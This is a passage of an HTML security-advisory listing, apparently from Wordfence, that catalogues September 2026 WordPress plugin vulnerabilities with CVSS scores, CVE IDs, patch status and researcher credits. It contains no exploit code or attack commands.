				<span>Published</span><br />
				<strong>Sep 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ccbf971e-9181-4a0c-88a4-efe8634c7b5c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42d4ec8b-d3ed-4aa3-a8b9-cddaf64a7531" target="_blank" rel="noopener">WP Compress &lt;= 7.22.01 &#8211; Missing Authorization to Unauthenticated Account Linking / Site Takeover via &#8216;force_ic_connect&#8217; and &#8216;apikey&#8217; Parameters</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-compress-image-optimizer" target="_blank" rel="noopener">WP Compress – Instant Performance &amp; Speed Optimization</a> <span class="wfvr-software-slug">[wp-compress-image-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42d4ec8b-d3ed-4aa3-a8b9-cddaf64a7531" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9ead21-6846-4ab0-97e3-84e68b60b3a8" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search &lt;= 1.82.284 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84821" target="_blank" rel="noopener noreferrer">							CVE-2026-84821						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search</a> <span class="wfvr-software-slug">[fulltext-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/william-honner-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1d0d9e663e94d9a4c2a76293e3f9489a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1d0d9e663e94d9a4c2a76293e3f9489a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/william-honner-2" target="_blank" rel="noopener">William Honnér</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9ead21-6846-4ab0-97e3-84e68b60b3a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a421399-0b93-4eb8-a76f-ec0079ae2582" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine &lt;= 12.0.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81796" target="_blank" rel="noopener noreferrer">							CVE-2026-81796						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sandeep-v-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/89395cfd0f3a74596c20f9baaa5f98a7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="89395cfd0f3a74596c20f9baaa5f98a7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sandeep-v-2" target="_blank" rel="noopener">Sandeep V</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a421399-0b93-4eb8-a76f-ec0079ae2582" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/226fa189-1ad7-467a-8274-b18e171f6448" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services &lt; 8.5.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87918" target="_blank" rel="noopener noreferrer">							CVE-2026-87918						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/226fa189-1ad7-467a-8274-b18e171f6448" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0467322-7fbc-40be-ad0f-23139de9d59e" target="_blank" rel="noopener">WPBot &lt;= 8.5.9 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87916" target="_blank" rel="noopener noreferrer">							CVE-2026-87916						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0467322-7fbc-40be-ad0f-23139de9d59e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4ef511b-baf7-481d-8a3f-637cf571f98e" target="_blank" rel="noopener">WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System 3.0.10 &#8211; 3.0.17 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86812" target="_blank" rel="noopener noreferrer">							CVE-2026-86812						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-cafe" target="_blank" rel="noopener">WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System</a> <span class="wfvr-software-slug">[wp-cafe]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4ef511b-baf7-481d-8a3f-637cf571f98e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a24d442-56f9-4f6d-bff6-0eb354249895" target="_blank" rel="noopener">WPFunnels &lt;= 3.12.13 &#8211; Missing Authorization to Unauthenticated Arbitrary Product Price Manipulation via &#8216;wpfnl_load_payment&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84908" target="_blank" rel="noopener noreferrer">							CVE-2026-84908						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpfunnels" target="_blank" rel="noopener">WPFunnels – Funnel Builder for WooCommerce with Checkout &amp; One Click Upsell</a> <span class="wfvr-software-slug">[wpfunnels]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a24d442-56f9-4f6d-bff6-0eb354249895" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d340b74c-e9e5-4221-a1f3-c8e652c575c8" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82184" target="_blank" rel="noopener noreferrer">							CVE-2026-82184						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-spataru" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d56703f4521f4d0dfebc1f75d67ad418.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d56703f4521f4d0dfebc1f75d67ad418"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-spataru" target="_blank" rel="noopener">Alex Spataru</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d340b74c-e9e5-4221-a1f3-c8e652c575c8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f16f623-8443-42d4-bfb5-a7618872bc10" target="_blank" rel="noopener">YITH WooCommerce Wishlist &lt; 4.18.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82305" target="_blank" rel="noopener noreferrer">							CVE-2026-82305						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yith-woocommerce-wishlist" target="_blank" rel="noopener">YITH WooCommerce Wishlist</a> <span class="wfvr-software-slug">[yith-woocommerce-wishlist]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f16f623-8443-42d4-bfb5-a7618872bc10" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4aec9958-78ee-40d3-b78e-3515836459ef" target="_blank" rel="noopener">ZHBackup – Backup, Restore &amp; Migration &lt;= 2.4.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81804" target="_blank" rel="noopener noreferrer">							CVE-2026-81804						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zhbackup" target="_blank" rel="noopener">ZHBackup – Backup, Restore &amp; Migration</a> <span class="wfvr-software-slug">[zhbackup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4aec9958-78ee-40d3-b78e-3515836459ef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bccf576-25c7-4dcd-9f07-cb41100dc45f" target="_blank" rel="noopener">zipMoney(Zip Co) Payments Plugin for WooCommerce &lt; 2.4.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78361" target="_blank" rel="noopener noreferrer">							CVE-2026-78361						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zipmoney-payments-woocommerce" target="_blank" rel="noopener">zipMoney(Zip Co) Payments Plugin for WooCommerce</a> <span class="wfvr-software-slug">[zipmoney-payments-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bccf576-25c7-4dcd-9f07-cb41100dc45f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a003bbc-2a75-4629-ab2e-8f0cbdaf4d45" target="_blank" rel="noopener">المنتور فارسی 2.7.10 &#8211; 2.8.1 &#8211; Payment Bypass to Unauthenticated Unauthorized Order Completion</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86809" target="_blank" rel="noopener noreferrer">							CVE-2026-86809						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">المنتور فارسی</a> <span class="wfvr-software-slug">[persian-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a003bbc-2a75-4629-ab2e-8f0cbdaf4d45" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bda1f4a6-a15a-4ac9-9649-b7fbf6021776" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt;= 2.4.9 &#8211; Authenticated (Editor+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62112" target="_blank" rel="noopener noreferrer">							CVE-2026-62112						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bda1f4a6-a15a-4ac9-9649-b7fbf6021776" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21aa8edc-0ba4-4bb1-857e-007b2364f665" target="_blank" rel="noopener">Directory Kit &lt;= 1.5.7 &#8211; Authenticated (Editor+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16593" target="_blank" rel="noopener noreferrer">							CVE-2026-16593						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
